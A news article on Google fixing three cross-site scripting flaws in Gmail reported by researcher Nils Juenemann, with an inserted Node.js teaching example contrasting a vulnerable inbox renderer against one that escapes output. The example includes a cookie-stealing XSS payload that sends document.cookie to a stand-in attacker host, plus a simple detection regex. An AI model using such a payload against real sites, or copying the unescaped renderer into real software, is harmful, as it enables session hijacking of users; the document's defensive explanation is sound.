Google has closed three cross-site scripting (XSS) holes in its Gmail email service, which serves more than 350 million active users who could have been exposed to malicious scripts. Security researcher Nils Juenemann found the three separate XSS flaws in Gmail and reported them to Google's Security Team under the company's Vulnerability Reward Program, which pays researchers up to $20,000 for discovering and reporting qualifying bugs in its web-based services.
The worst of the three was a persistent (stored) XSS. This is the most dangerous class of XSS flaw because the data supplied by the attacker is saved by the server and later served back to other users, so the attacker's script runs in every victim's browser, inside the victim's Gmail session, without the victim having to click a crafted link.
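The mechanism described above, as an added example that is not Gmail's code or Juenemann's: a minimal Node.js model of a webmail inbox where a server stores messages verbatim and two renderers emit them into HTML, one by raw concatenation (the stored XSS) and one with output encoding at the sink. The in-memory store, the attacker's payload, the page template and the `containsActiveMarkup` check are all constructed for the demo.

```javascript
// Added example (not Gmail's code): how a persistent (stored) XSS arises and
// how output encoding at the sink removes it. Runs under Node.js, no dependencies.
// The message store, payload, and page template are constructed for the demo.

// In-memory stand-in for a server-side datastore (constructed).
const inbox = [];

// The server accepts a message from anyone and persists it verbatim. Storing
// attacker data is not the bug; the bug is how that data is later emitted as HTML.
function storeMessage(from, subject) {
  inbox.push({ from, subject });
}

// Minimal HTML escaping: the five characters that can change HTML structure.
// Only correct for HTML text and quoted-attribute contexts; a value placed inside
// a <script> block, a URL, or an event handler needs context-specific encoding.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable renderer: stored, attacker-controlled strings are concatenated into
// the page as markup, so every user who opens the inbox runs the attacker's script.
function renderInboxVulnerable() {
  const rows = inbox.map(m => `<li><b>${m.from}</b>: ${m.subject}</li>`).join('');
  return `<ul>${rows}</ul>`;
}

// Hardened renderer: the same template, with every untrusted value escaped at the sink.
function renderInboxSafe() {
  const rows = inbox
    .map(m => `<li><b>${escapeHtml(m.from)}</b>: ${escapeHtml(m.subject)}</li>`)
    .join('');
  return `<ul>${rows}</ul>`;
}

// Crude detector for the demo only: does a raw script tag or an <img> with an
// inline onerror handler survive into the output? Real pipelines use an HTML
// parser, not a regex, to answer that question.
function containsActiveMarkup(html) {
  return /<script\b|<img\b[^>]*\bonerror=/i.test(html);
}

// Constructed attacker message: a "subject" that is really markup which, if
// rendered raw, ships the reader's cookies to a host the attacker controls.
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Stores one benign and one malicious message, then renders the inbox both ways
// and reports whether the payload survived as live markup in each output.
function demo() {
  inbox.length = 0;
  storeMessage('alice@example.com', 'lunch?');
  storeMessage('mallory@example.com', PAYLOAD);
  return {
    vulnerable: containsActiveMarkup(renderInboxVulnerable()),
    safe: containsActiveMarkup(renderInboxSafe()),
  };
}

console.log(demo()); // { vulnerable: true, safe: false }
```

The point worth taking from the example is that the stored and reflected variants share the same sink: the only difference is whether the attacker's string passed through the datastore first, which is also why a stored bug reaches every reader rather than just those who follow a crafted link.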
The other two were a persistent DOM-based (Document Object Model) XSS bug and a reflected DOM-based XSS bug in Gmail's mobile view, the version served to tablets such as the iPad. Juenemann says the Google Security Team was quick to fix the bugs once he reported them. Further details are in Juenemann's blog post, in which he also urges users to enable 2-step verification on their accounts.